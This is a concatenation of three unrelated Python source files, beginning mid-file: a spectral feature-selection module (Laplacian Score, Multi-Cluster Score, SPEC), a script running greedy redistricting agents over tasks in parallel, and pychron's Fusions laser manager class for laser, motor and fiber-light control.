It accelerates the graph edge updating with leverage of multiprocessing technology.
Input: An adjacencylist (graph).
Output: An adjacencylist (graph).
Updating the graph edges with different proses
"""
def __init__(self, adjacency_list, gama=None):
self.adjacency_list = adjacency_list
self.gama = gama
@staticmethod
def progress_bar(counter, total, process_id=1, status='', functionality=None):
bar_len = 40
filled_len = int(round(bar_len * counter / float(total)))
percents = round(100.0 * counter / float(total), 1)
bar = '|' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
'\r\033[1;36;m[%s] <%s> chunk_id <%s> %s%s ...%s' % (bar,
functionality,
process_id,
percents,
'%',
status))
sys.stdout.flush()
return 0
def set(self, data, process_id):
progress_line_len = len(data)
actual_progress = 0
for v in data:
actual_progress += 1
self.progress_bar(actual_progress,
progress_line_len,
process_id,
status=str(actual_progress) + "/" + str(progress_line_len) + " ",
functionality='Update by RBf_kernel')
v = self.adjacency_list.get_vertex(str(v))
vid = v.get_id()
for w in v.get_connections():
wid = w.get_id()
euclidean_weight = v.get_weight(w)
rbf_weight = rbf_kernel(pre_distance=euclidean_weight, gamma=self.gama)
self.adjacency_list.update_edge(str(vid),
str(wid),
rbf_weight,
smallest=False)
def get(self):
return self.adjacency_list
def update_accelerator(obj, items, process_id):
obj.set(items, process_id)
######################################################################
# Base class
######################################################################
class _BaseSpectralSelector(object):
"""Initialize the spectral feature selection.
- Generate the KNN graph and matrix.
- Calculate the RBF kernel values and update the KNN graph
Parameters
"""
def __init__(self, X=None, method=None, default_boostrap_bag_size=4500):
self.hasFitted = False
self.adjacencyList = KNN()
self.originData = X
self.adjacencyMatrix = None
self.original_index = None
self.default_boostrap_bag_size = default_boostrap_bag_size
self.featureScoure = {'method': method, 'features': None, 'scores': np.array([])}
@staticmethod
def progress_bar(counter, total, process_id=1, status='', functionality=None):
bar_len = 40
filled_len = int(round(bar_len * counter / float(total)))
percents = round(100.0 * counter / float(total), 1)
bar = '|' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
'\r\033[1;36;m[%s] <%s> chunk_id <%s> %s%s ...%s' % (bar,
functionality,
process_id,
percents,
'%',
status))
def fit(self, X, adjacencyMatrix=True, parallel=True,
recursion_limit=None, multi_process=None, bag_size=None):
"""Run KNN on the X and obtain the adjacencyList.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
The training input samples.
adjacencyMatrix:
parallel:
recursion_limit:
multi_process:
bag_size:
Returns
-------
self : object
"""
if bag_size:
self.default_boostrap_bag_size = bag_size
# fixme: it is a duplicated action
self.originData = data_structure_Compatibilization(data=X,
header=True,
index=True)
# make copy of the old index (for distributed matching)
self.originData = self.originData.drop(axis=1, labels=['index']) # After pandas 0.21.0 : columns=['index']
# Resampling from the data, the high duration is more probable for selecting.
# TODO:
"""
Implement an stochastic method for selecting from different bags.
(the one that is more close to the original data)
Know, we just generate one bag.
"""
if self.originData.shape[0] < self.default_boostrap_bag_size:
self.default_boostrap_bag_size = self.originData.shape[0]
else:
pass
try:
self.originData = WightedBootstrapping.wighted_resampeling(X=self.originData,
bag_size=self.default_boostrap_bag_size,
replace=True,
bags=1,
weight='Duration').get('0')
except ValueError:
# In case of:Invalid weights: weights sum to zero
self.originData = WightedBootstrapping.wighted_resampeling(X=self.originData,
bag_size=self.default_boostrap_bag_size,
replace=True,
bags=1).get('0')
finally:
self.originData.reset_index(inplace=True) # reset index is needed, some indexses are missed
self.original_index = self.originData['index'].copy()
self.originData = self.originData.drop(axis=1, labels=['Duration'])
self.originData = self.originData.drop(axis=1, labels=['index']) # After pandas 0.21.0 : columns=['index']
# fixme: it is obligatory to make the data standardize, it should move to data pre-processing
self.originData = pd.DataFrame(scale(self.originData,
with_mean=True,
with_std=True,
copy=False),
index=self.originData.index,
columns=self.originData.columns)
# Initiate the feature rank list that will updated by the Specific methods
self.featureScoure['features'] = np.array(self.originData.columns.tolist())
self._check_params(self.originData)
self.adjacencyList.fit(self.originData,
adjacencyMatrix=False,
header=True,
index=True)
gammaValue = gamma(self.originData)
# TODO: Combine with filter and ensemble
# TODO: Matrix product version of rbf_kernel ????? It will be faster in Euclidean one.
'''
Alternative of rbf_kernal:
rbf_kernal_matrix=f = lambda x: np.exp(x**2*(-gammaValue))
rbf_kernal_matrix(self.adjacencyList.graph_to_matrix())
'''
if parallel:
# TODO: Use multiprocess + HDF5 here
if recursion_limit is None:
# TODO: It is needed to find an optimal values for. it.
recursion_limit = self.originData.shape[0] ** 2
warnings.warn(
"The recursion_limit is set to {} automatically.".format(recursion_limit, UserWarning))
else:
warnings.warn("v The recursion_limit is set to {} manually.".format(recursion_limit, UserWarning))
sys.setrecursionlimit(recursion_limit)
if multi_process is None:
# TODO: It is needed to calculate the optimal chunk number.
chunk_number = 10
warnings.warn("The multi_process is set to {} by default.".format(chunk_number, UserWarning))
else:
chunk_number = multi_process
BaseManager.register('FastUpdate', GraphUpdateAccelerator)
manager = BaseManager()
manager.start()
temporal_knnGraph = manager.FastUpdate(self.adjacencyList.knnGraph, gama=gammaValue)
# TODO: rewrite it as a module.
chunks = list_splitter(list(self.adjacencyList.knnGraph.vert_dict.keys()), chunks=chunk_number)
processes = [Process(target=update_accelerator, args=[temporal_knnGraph, chunks[chunk_id], chunk_id]) for
chunk_id in range(0, chunk_number)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if p.is_alive():
print("Job {} is not finished!".format(p))
# Gather the data from the different presses
self.adjacencyList.knnGraph = temporal_knnGraph.get()
else:
progress_line_len = len(self.adjacencyList.knnGraph.vert_dict) * self.adjacencyList.k_nighbors
actual_progress = 0
print('\n')
for v in self.adjacencyList.knnGraph:
vid = v.get_id()
for w in v.get_connections():
actual_progress += 1
self.progress_bar(actual_progress,
progress_line_len,
1,
status=str(actual_progress) + "/" + str(progress_line_len),
functionality='Update by RBf_kernel')
wid = w.get_id()
'''
Old rbf: rbf_kernel(X=self.originData.loc[int(vid)],
Y=self.originData.loc[int(wid)],
gamma=gammaValue)
'''
euclidean_weight = v.get_weight(w)
rbf_weight = rbf_kernel(pre_distance=euclidean_weight, gamma=gammaValue)
self.adjacencyList.knnGraph.update_edge(str(vid),
str(wid),
rbf_weight,
smallest=False)
if adjacencyMatrix:
self.adjacencyMatrix = self.adjacencyList.graph_to_matrix(binary=False)
self.hasFitted = True
return self
# Sort Descending.
def _sorted_features(self, order=-1):
index = np.array(self.featureScoure['scores']).argsort(kind='quicksort')
return {'sorted_features': self.featureScoure['features'][index][::order],
'sorted_scores': self.featureScoure['scores'][index][::order],
'ordered': order}
def feature_score_table(self):
sortedFeatureScore = self._sorted_features()
if sortedFeatureScore.get('ordered') == 1:
sort_arrow = '\u2191'
elif sortedFeatureScore.get('ordered') == -1:
sort_arrow = '\u2193'
else:
raise ValueError("The ordered direction has to be ascending or descending.")
table_data = [
['Rank', 'Feature', str('Score ' + sort_arrow)]
]
for rank, featureItem in enumerate(sortedFeatureScore['sorted_features']):
table_data.append([rank,
featureItem,
sortedFeatureScore['sorted_scores'][rank]])
table = DoubleTable(table_data,
title='{}'.format(str.upper(self.featureScoure['method'])))
table.justify_columns[2] = 'center'
return table
def _check_params(self, X):
pass
# TODO: It is needed to add progress bar to flow the process.
######################################################################
# Specific methods
######################################################################
# isdone: it is speeded up up.
class LaplacianScore(_BaseSpectralSelector):
""" Ranking the features according to the smallest Laplacian scores.
Objective function:
Min
Parameters:
----------
Attributes:
----------
Examples:
--------
See also:
https://papers.nips.cc/paper/laplacian-score-for-feature-selection.pdf
"""
def __init__(self, X=None, k=None):
# It is just for methods uniforming and k is not useful for LS.
self.k = k
super(LaplacianScore, self).__init__(X, 'LaplacianScore')
# Sort the list Ascending.
def _sorted_features(self, order=1):
return super(LaplacianScore, self)._sorted_features(order=order)
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
raise ValueError('The model has not fitted and the X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
grapfLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
for feature in self.originData.columns:
featureVector = np.array(self.originData[feature].tolist())
featureRHat = np.array(featureVector
- (np.dot(featureVector, degreeMatrix)
/ degreeMatrix.sum()))
# todo: check the functionality of transpose
featureLaplacianScore = np.dot(np.dot(featureRHat, grapfLaplacian),
featureRHat.transpose())
self.featureScoure['scores'] = np.append(self.featureScoure['scores'],
featureLaplacianScore)
def _check_params(self, X):
pass
class MultiClusterScore(_BaseSpectralSelector):
""" Ranking the features according to the highest Multi-Cluster Score.
Objective function: Max
Parameters
----------
Attributes
----------
Examples
--------
See also
--------
http://www.cad.zju.edu.cn/home/dengcai/Publication/Conference/Multi-*cluster_analysis-feature-selection.pdf
"""
def __init__(self, X=None, k=None, d=None):
super(MultiClusterScore, self).__init__(X, 'Multi-Cluster')
self.k_clusters = k
self.d_selectedFeatures = d
def __k_cluster_estimator(self):
k = round(math.sqrt(self.originData.shape[0]))
if math.fmod(k, 2) == 1:
return k
else:
return k + 1
def __update_scores(self, coefficientVector):
coefficientVector = np.absolute(coefficientVector)
if not len(self.featureScoure['scores']):
self.featureScoure['scores'] = coefficientVector
for index, featureScoreItem in enumerate(self.featureScoure['scores']):
self.featureScoure['scores'][index] = max(featureScoreItem,
coefficientVector[index])
# TODO: make the output colorized if the value is changed in any iteration
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
raise ValueError('The model has not fitted and the X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
graphLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
# Calculate spectral Decomposition of graph Laplacian
graphLaplacian = np.dot(np.linalg.inv(graphLaplacian), graphLaplacian)
eigenValues, eigenVectors = np.linalg.eigh(graphLaplacian)
# The eigen values have to be abs()
eigenValues = np.abs(eigenValues)
# TODO: it should move to _check_parameter
with warnings.catch_warnings():
warnings.simplefilter("default", UserWarning)
# Initiate the k
if self.k_clusters is None:
# fixme: the k estimator have to be writen
self.k_clusters = self.__k_cluster_estimator()
warnings.warn('\n The k parameter has not indicated, It is set automatically to {}.'
.format(self.k_clusters), UserWarning, stacklevel=2)
elif self.k_clusters > len(eigenValues):
raise ValueError("k (multi-clusters) > {} flat embedding vectors.".format(len(eigenValues)))
# Initiate the d
if self.d_selectedFeatures is None:
self.d_selectedFeatures = self.originData.shape[1]
print("\n")
warnings.warn('The d selected Features has not indicated, It is set automatically to {}.'
.format(self.d_selectedFeatures), UserWarning, stacklevel=2)
elif self.d_selectedFeatures > self.originData.shape[1]:
print("\n")
raise ValueError(
'The d selected Features > {} flat embedding vectors.'.format(self.originData.shape[1]))
eigens = dict(zip(eigenValues.real,
eigenVectors))
eigens = dict(sorted(eigens.items(),
key=operator.itemgetter(0),
reverse=True)) # sort inplace
# Solve the L1-regularized regressions K time
reg = linear_model.Lars(n_nonzero_coefs=self.d_selectedFeatures)
for eigenItem in range(self.k_clusters):
_, vector = eigens.popitem()
reg.fit(self.originData, vector)
self.__update_scores(np.array(reg.coef_))
def _check_params(self, X):
pass
class SPEC(_BaseSpectralSelector):
""" Ranking the features according to the highest Laplacian scores.
Parameters
----------
K: it is the number of the clusters
Attributes
----------
Examples
--------
See also
--------
https://papers.nips.cc/paper/laplacian-score-for-feature-selection.pdf
"""
# TODO: rewrite the feature sorting function that can accept the sorting parameter
"""
Separability_scores and Normalized_Separability_scores are Ascending
and K_cluster_Separability_scores is Descending.
"""
def _sorted_features(self, order=1, sort_by="Separability_scores"):
if sort_by == "Separability_scores":
index = np.array(self.featureScoure['Separability_scores']).argsort(kind='quicksort')
elif sort_by == "Normalized_Separability_scores":
index = np.array(self.featureScoure['Normalized_Separability_scores']).argsort(kind='quicksort')
elif sort_by == "K_cluster_Separability_scores":
index = np.array(self.featureScoure['K_cluster_Separability_scores']).argsort(kind='quicksort')
order = -1
else:
raise ValueError('The score {} is not fined.(Separability_scores, '
'Normalized_Separability_scores, '
'K_cluster_Separability_scores)'.format(sort_by))
return {'sorted_features': self.featureScoure['features'][index][::order],
'sorted_Separability': self.featureScoure['Separability_scores'][index][::order],
'sorted_Normalized_Separability': self.featureScoure['Normalized_Separability_scores'][index][::order],
'sorted_K_cluster_Separability': self.featureScoure['K_cluster_Separability_scores'][index][::order],
'sort_by': sort_by}
def feature_score_table(self):
sortedFeatureScore = self._sorted_features()
table_data = [
['Rank',
'Feature',
'Separability_scores \u2191',
'Normalized_Separability_scores',
'K_cluster_Separability_scores']
]
for rank, featureItem in enumerate(sortedFeatureScore['sorted_features']):
table_data.append([rank,
featureItem,
sortedFeatureScore['sorted_Separability'][rank],
sortedFeatureScore['sorted_Normalized_Separability'][rank],
sortedFeatureScore['sorted_K_cluster_Separability'][rank]])
table = DoubleTable(table_data,
title='{}'.format(str.upper(self.featureScoure['method'])))
table.justify_columns[2] = 'center'
return table
def __init__(self, X=None, k=None):
super(SPEC, self).__init__(X, 'SPEC')
self.k = k
self.featureScoure = {'method': 'SPEC',
'features': None,
'Separability_scores': np.array([]),
'Normalized_Separability_scores': np.array([]),
'K_cluster_Separability_scores': np.array([])}
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
raise ValueError('The model has not fitted and the X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
graphLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
# normalized graph Laplacian (alias name is used for memory efficiency purposes)
normalizedGraphLaplacian = graphLaplacian = np.power(degreeMatrix, -0.5) \
* graphLaplacian \
* np.power(degreeMatrix, -0.5)[:, np.newaxis]
del (graphLaplacian) # graphLaplacian is not valid any more.
# Calculate spectral Decomposition of normalized graph Laplacian
eigenValues, eigenVectors = np.linalg.eigh(np.dot(np.linalg.inv(normalizedGraphLaplacian),
normalizedGraphLaplacian))
# TODO: the eigen values have to be abs()
eigenValues = np.abs(eigenValues)
microDensityIndicator = eigenVectors[np.argmax(eigenValues)]
eigenValues, eigenVectors = sort_parja(eigenValues, eigenVectors, order=-1)
for feature in self.originData.columns:
featureVector = np.array(self.originData[feature].tolist())
featureVectorTilda = np.sqrt(degreeMatrix) * featureVector
featureVectorHat = featureVectorTilda / featureVectorTilda.sum()
# TODO: it needs to check the calculation with Cosine similarity
# Ranking Function 1: the value of the normalized cut (Shi & Malik, 1997) - ascending
graphSeparability = np.dot(np.dot(featureVectorHat, normalizedGraphLaplacian),
featureVectorHat.transpose())
# Ranking Function 2: use spectral eigenValues to normalize the Ranking Function 1. - ascending
normalizedGraphSeparability = graphSeparability / (1 - np.dot(featureVectorHat, microDensityIndicator))
# Ranking Function 3: If the k ( number of clusters) is indicated, it should use the reducing noise.
if self.k is not None:
kGraphSeparability = 0
for eigenValueItem, eigenVectorItem in heapq.nlargest(self.k, zip(eigenValues, eigenVectors)):
kGraphSeparability += eigenValueItem * np.power(
cosine_similarity([featureVector], [eigenVectorItem]), 2)
# Update the score list
self.featureScoure['Separability_scores'] = np.append(
self.featureScoure['Separability_scores'],
graphSeparability)
self.featureScoure['Normalized_Separability_scores'] = np.append(
self.featureScoure['Normalized_Separability_scores'],
normalizedGraphSeparability)
self.featureScoure['K_cluster_Separability_scores'] = np.append(
self.featureScoure['K_cluster_Separability_scores'],
kGraphSeparability)
def _check_params(self, X):
pass
def __test_me():
# sample data
'''
data = np.array([(1, 1, 1, 1, 1, 1, 1),
(2, 2, 2, 2, 1, 2, 2),
(2, 2, 45, 23, 24, 13, 16),
(3, 12, 0, 9, 5, 20, 89)])
data1 = np.array([("ind", "F1", "F2", "F3", "F4", "F5", "F6"),
(1, 1, 1, 1, 1, 1, 1),
(2, 2, 2, 2, 2, 2, 2),
(3, 4, 45, 23, 24, 19, 16),
(4, 2, 44, 23, 22, 13, 11),
(5, 2, 4, 3, 2, 1, 1),
(6, 1, 1, 1, 1, 1, 1),
(7, 2, 2, 2, 2, 2, 2),
(8, 2, 45, 23, 24, 13, 16),
(9, 12, 0, 9, 5, 20, 89),
(10, 6, 7, 8, 3, 8, 2)])
headers = ['A', 'B', 'C', 'D', 'E', 'F', 'G']
index = [1, 2, 3, 4]
df = pd.DataFrame(data, columns=headers, index=index, dtype=np.float)
'''
df = __configoration('config/config_lulesh_27p.json', '../parser/source.csv')
# feature selection
test2 = SPEC(k=2)
test2.fit(df)
test2.rank_features(df)
print(test2.featureScoure)
def __select_feature():
start = time.time()
# try:
args = arguments_parser()
df = __configoration(args['configPath'], args['csvPath'])
if args['featureSelectionMethod'] == 'LS':
featureSelectionModel = LaplacianScore(k=args['k_features'])
elif args['featureSelectionMethod'] == 'MCFS':
featureSelectionModel = MultiClusterScore(k=args['k_features'])
elif args['featureSelectionMethod'] == 'SPEC':
featureSelectionModel = SPEC(k=args['k_features'])
else:
pass
featureSelectionModel.fit(df, bag_size=args['bag_size'])
featureSelectionModel.rank_features() # fixme: when the data is fitted it dose not need to refit here
print("\n", featureSelectionModel.featureScoure)
print(featureSelectionModel.feature_score_table().table)
print("\033[32mThe feature selection process is successfully completed by {} method.".format(
featureSelectionModel.featureScoure.get("method")))
# except:
# print("\033[31mThe feature selection proses is failed.")
# finally:
duration = time.time() - start
print('\033[0mTotal duration is: %.3f' % duration)
if __name__ == '__main__':
# __test_me()
__select_feature()
|
run_job.py
|
import numpy as np
from bfagent import GreedyAgent
import argparse
import os
from multiprocessing import Pool, Queue
from tqdm import tqdm
from threading import Thread
import itertools
import pickle as pkl
metrics = ['population', 'pvi', 'compactness', 'projected_votes', 'race']
with open('resources/stripped_normalization.pkl', 'rb') as z_file:
means, stds = pkl.load(z_file)
metric_means = np.array(means)
metric_stds = np.array(stds)
tasks = []
# for i in range(len(metrics)):
# task_up = np.zeros(len(metrics))
# task_up[i] = 1
# task_down = np.zeros(len(metrics))
# task_down[i] = -1
# tasks.append(task_up)
# tasks.append(task_down)
# tasks = tasks * 9
tasks = list(map(np.array,itertools.product([-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.])))
if __name__ == '__main__':
argparser = argparse.ArgumentParser(description="Run a Greedy Agent task")
argparser.add_argument('n_steps', type=int)
args = argparser.parse_args()
n_steps = args.n_steps
status_queue = Queue()
def progress_monitor():
for i in tqdm(range(len(tasks) * n_steps)):
status_queue.get()
def process_task(i, task):
greedy_agent = GreedyAgent(metrics=metrics,pop_mean=metric_means,pop_std=metric_stds)
greedy_agent.set_task(task)
out_dir = os.path.join(os.path.dirname(__file__), 'logs')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
task_str = ','.join(map(str, task))
with open(os.path.join(out_dir, task_str + '_exc_log_'+str(i)), 'w+') as exc_logger:
with open(os.path.join(out_dir, task_str + '_log_'+str(i)), 'w+') as logger:
return greedy_agent.run(n_steps, logger, exc_logger, status_queue)
thread = Thread(target=progress_monitor)
thread.start()
with Pool(96) as pool:
results = pool.starmap(process_task, list(enumerate(tasks)))
for res, config in results:
print('{}: {}'.format(','.join(map(str, config)), res))
|
fusions_laser_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from traits.api import (
DelegatesTo,
Instance,
Str,
List,
Dict,
on_trait_change,
Event,
Bool,
Any,
)
from traitsui.api import HGroup, spring, UReadonly, Readonly
from pychron.core.helpers.strtools import to_bool
from pychron.core.pychron_traits import BorderVGroup
from pychron.hardware.fiber_light import FiberLight
from pychron.hardware.fusions.fusions_logic_board import FusionsLogicBoard
from pychron.lasers.laser_managers.laser_manager import LaserManager
from pychron.response_recorder import ResponseRecorder
class FusionsLaserManager(LaserManager):
""" """
laser_controller = Instance(FusionsLogicBoard)
fiber_light = Instance(FiberLight)
response_recorder = Instance(ResponseRecorder)
power_timer = None
brightness_timer = None
power_graph = None
_prev_power = 0
record_brightness = Bool
# recording_zoom = Float
# record = Event
# record_label = Property(depends_on='_recording_power_state')
_recording_power_state = Bool(False)
simulation = DelegatesTo("laser_controller")
data_manager = None
_data_manager_lock = None
_current_rid = None
chiller = Any
motor_event = Event
def finish_loading(self):
super(FusionsLaserManager, self).finish_loading()
self.do_motor_initialization()
# ===============================================================================
# IExtractionDevice interface
# ===============================================================================
def stop_measure_grain_polygon(self):
return self.stage_manager.stop_measure_grain_polygon()
def start_measure_grain_polygon(self):
return self.stage_manager.start_measure_grain_polygon()
def get_grain_polygon(self):
return self.stage_manager.get_grain_polygon()
def get_grain_polygon_blob(self):
return self.stage_manager.get_grain_polygon_blob()
def extract(self, power, units=None, **kw):
if self.enable_laser():
self.set_laser_power(power, units=units)
def end_extract(self):
self.disable_laser()
self.stop_pattern()
def open_motor_configure(self):
self.laser_controller.open_motor_configure()
def bind_preferences(self, pref_id):
self.debug("binding preferences")
super(FusionsLaserManager, self).bind_preferences(pref_id)
bind_preference(self, "recording_zoom", "{}.recording_zoom".format(pref_id))
bind_preference(
self, "record_brightness", "{}.record_brightness".format(pref_id)
)
self.debug("preferences bound")
def set_light(self, value):
try:
value = float(value)
except ValueError:
return
self.set_light_state(value > 0)
self.set_light_intensity(value)
def set_light_state(self, state):
if state:
self.fiber_light.power_on()
else:
self.fiber_light.power_off()
def set_light_intensity(self, v):
self.fiber_light.intensity = min(max(0, v), 100)
@on_trait_change("laser_controller:refresh_canvas")
def refresh_canvas(self):
if self.stage_manager:
self.stage_manager.canvas.request_redraw()
# @on_trait_change('pointer')
# def pointer_ononff(self):
# """
# """
# self.pointer_state = not self.pointer_state
# self.laser_controller.set_pointer_onoff(self.pointer_state)
def get_laser_watts(self):
return self._requested_power
def get_coolant_temperature(self, **kw):
""" """
chiller = self.chiller
if chiller is not None:
return chiller.get_coolant_out_temperature(**kw)
def get_coolant_status(self, **kw):
chiller = self.chiller
if chiller is not None:
return chiller.get_faults(**kw)
def do_motor_initialization(self):
self.debug("do motor initialization")
if self.laser_controller:
for motor in self.laser_controller.motors:
# motor = self.laser_controller.get_motor(name)
# if motor is not None:
def handle(obj, name, old, new):
# self.motor_event = (motor.name, new)
self.stage_manager.motor_event_hook(obj.name, new)
motor.on_trait_change(handle, "_data_position")
def set_beam_diameter(self, bd, force=False, **kw):
""" """
result = False
motor = self.get_motor("beam")
if motor is not None:
if motor.enabled or force:
self.set_motor("beam", bd, **kw)
result = True
return result
def set_zoom(self, z, **kw):
""" """
self.set_motor("zoom", z, **kw)
def set_motor_lock(self, name, value):
m = self.get_motor(name)
if m is not None:
m.locked = to_bool(value)
return True
def set_motor(self, *args, **kw):
self.stage_manager.motor_event_hook(*args, **kw)
return self.laser_controller.set_motor(*args, **kw)
def get_motor(self, name):
return next(
(mi for mi in self.laser_controller.motors if mi.name == name), None
)
def do_autofocus(self, **kw):
if self.use_video:
am = self.stage_manager.autofocus_manager
am.passive_focus(block=True, **kw)
def take_snapshot(self, *args, **kw):
if self.use_video:
return self.stage_manager.snapshot(auto=True, inform=False, *args, **kw)
def start_video_recording(self, name="video", *args, **kw):
if self.use_video:
return self.stage_manager.start_recording(basename=name)
def stop_video_recording(self, *args, **kw):
if self.use_video:
return self.stage_manager.stop_recording()
# def degasser_factory(self):
# from pychron.mv.degas.degasser import Degasser
#
# dm = Degasser(laser_manager=self)
# return dm
#
# def do_machine_vision_degas(self, lumens, duration, new_thread=False):
# if self.use_video:
# dm = self.degasser_factory()
#
# def func():
# dm.degas(lumens, duration)
#
# if new_thread:
# self._degas_thread = Thread(target=func)
# self._degas_thread.start()
# else:
# func()
# def get_peak_brightness(self, **kw):
# if self.use_video:
# args = self.stage_manager.find_lum_peak(**kw)
# if args is not None:
# pt, peaks, cpeaks, lum = args
# return peaks, lum
def get_brightness(self, **kw):
if self.use_video:
return self.stage_manager.get_brightness(**kw)
else:
return super(FusionsLaserManager, self).get_brightness(**kw)
def luminosity_degas_test(self):
self.enable_laser()
p = self.pulse.power
self.debug("luminosity degas test. {}".format(p))
self._luminosity_hook(p, autostart=True)
def set_stage_map(self, mapname):
if self.stage_manager is not None:
self.stage_manager.set_stage_map(mapname)
# ===============================================================================
# pyscript interface
# ===============================================================================
def show_motion_controller_manager(self):
""" """
stage_controller = self.stage_manager.stage_controller
package = "pychron.managers.motion_controller_managers"
if "Aerotech" in stage_controller.__class__.__name__:
klass = "AerotechMotionControllerManager"
package += ".aerotech_motion_controller_manager"
else:
klass = "NewportMotionControllerManager"
package += ".newport_motion_controller_manager"
module = __import__(package, globals(), locals(), [klass], -1)
factory = getattr(module, klass)
m = factory(motion_controller=stage_controller)
self.open_view(m)
def get_response_blob(self):
return (
self.response_recorder.get_response_blob() if self.response_recorder else ""
)
def get_output_blob(self):
return (
self.response_recorder.get_output_blob() if self.response_recorder else ""
)
def set_response_recorder_period(self, p):
if self.response_recorder:
self.response_recorder.period = p
def start_response_recorder(self):
if self.response_recorder:
self.response_recorder.start()
def stop_response_recorder(self):
if self.response_recorder:
self.response_recorder.stop()
# private
def _luminosity_hook(self, power, **kw):
self.degasser.degas(power, **kw)
def _move_to_position(self, position, autocenter):
if self.stage_manager is not None:
if isinstance(position, tuple):
if len(position) > 1:
x, y = position[:2]
self.stage_manager.linear_move(x, y)
if len(position) == 3:
self.stage_manager.set_z(position[2])
else:
self.stage_manager.move_to_hole(position)
return True
def _disable_hook(self):
self.degasser.stop()
return super(FusionsLaserManager, self)._disable_hook()
# ========================= views =========================
def get_control_buttons(self):
""" """
return [
("enable", "enable_label", None),
]
def get_power_group(self):
power_grp = BorderVGroup(
self.get_control_button_group(),
HGroup(
Readonly("requested_power", format_str="%0.2f", width=100),
spring,
UReadonly("units"),
spring,
),
label="Power",
)
return power_grp
def _get_record_label(self):
return "Record" if not self._recording_power_state else "Stop"
def _get_record_brightness(self):
return self.record_brightness and self._get_machine_vision() is not None
# ========================= defaults =======================
def _fiber_light_default(self):
""" """
return FiberLight(name="fiber_light")
if __name__ == "__main__":
d = FusionsLaserManager()
# ========================== EOF ====================================
# def get_power_database(self):
# def get_additional_group(self):
# og = Group(Item('laser_controller', show_label=False,
# editor=InstanceEditor(view='control_view'),
# style='custom'),
# label='Optics',
# )
# ac = Group(
# og,
# show_border=True,
# label='Additional Controls',
# layout='tabbed')
#
# aclist = self.get_additional_controls()
# if aclist is None:
# og.label = 'Optics'
# og.show_border = True
# ac = og
# else:
# for ai in aclist:
# ac.content.append(ai)
# return ac
# def get_control_group(self):
# '''
# '''
# power_grp = self.get_power_group()
# pulse_grp = Group(Item('pulse', style='custom', show_label=False),
# label='Pulse', show_border=True
# )
# power_grp = HGroup(power_grp, pulse_grp)
# ac = self.get_additional_group()
# g = HGroup(power_grp, ac)
#
# return g
# from pychron.database.adapters.power_adapter import PowerAdapter
#
# db = PowerAdapter(name=self.dbname,
# kind='sqlite')
# return db
# def get_power_calibration_database(self):
# from pychron.database.adapters.power_calibration_adapter import PowerCalibrationAdapter
#
# db = PowerCalibrationAdapter(name=self.dbname,
# kind='sqlite')
# return db
# def _subsystem_default(self):
# '''
# '''
# return ArduinoSubsystem(name='arduino_subsystem_2')
# def _brightness_meter_default(self):
# if self.use_video:
# b = BrightnessPIDManager(parent=self)
# # b.brightness_manager.video = self.stage_manager.video
#
# return b
# def get_control_items(self):
# '''
# '''
# # return Item('laser_controller', show_label=False,
# # editor=InstanceEditor(view='control_view'),
# # style='custom',
# # springy=False, height= -100)
#
# # return self.laser_controller.get_control_group()
# s = [('zoom', 'zoom', {}),
# ('beam', 'beam', {'enabled_when':'object.beam_enabled'})
# ]
# return self._update_slider_group_factory(s)
# def get_lens_configuration_group(self):
# return Item('lens_configuration',
# editor=EnumEditor(values=self.lens_configuration_names)
# )
# def get_optics_group(self):
# csliders = self.get_control_items()
# vg = HGroup(csliders,
# show_border=True,
# label='Optics', springy=False
# )
#
# lens_config = self.get_lens_configuration_group()
# if lens_config:
# vg.content.insert(0, lens_config)
#
# return vg
# def get_control_button_group(self):
# grp = HGroup(spring, Item('enabled_led', show_label=False, style='custom', editor=LEDEditor()),
# self._button_group_factory(self.get_control_buttons(), orientation='h'),
# # springy=True
# )
# return grp
# def collect_baseline_brightness(self, **kw):
# bm = self.brightness_manager
# if bm is not None:
# bm.collect_baseline(**kw)
#
# def get_laser_brightness(self, **kw):
# bm = self.brightness_manager
# if bm is not None:
# return bm.get_value(**kw)
# def _open_power_graph(self, graph):
# ui = graph.edit_traits()
# self.add_window(ui)
#
# def _dispose_optional_windows_hook(self):
# if self.power_graph is not None:
# self.power_graph.close()
# def _lens_configuration_changed(self):
#
# t = Thread(target=self.set_lens_configuration)
# t.start()
# def open_power_graph(self, rid, path=None):
# if self.power_graph is not None:
# self.power_graph.close()
# del(self.power_graph)
#
# g = StreamGraph(
# window_x=0.01,
# window_y=0.4,
# container_dict=dict(padding=5),
# # view_identifier='pychron.fusions.power_graph'
# )
# self.power_graph = g
#
# g.window_title = 'Power Readback - {}'.format(rid)
# g.new_plot(data_limit=60,
# scan_delay=1,
# xtitle='time (s)',
# ytitle='power (%)',
#
# )
# g.new_series()
#
# if self.record_brightness:
# g.new_series()
#
# invoke_in_main_thread(self._open_power_graph, g)
# def finish_loading(self):
# '''
# '''
# # if self.fiber_light._cdevice is None:
# # self.fiber_light._cdevice = self.subsystem.get_module('FiberLightModule')
#
# super(FusionsLaserManager, self).finish_loading()
# # self.load_lens_configurations()
# def load_lens_configurations(self):
# for config_name in ['gaussian', 'homogenizer']:
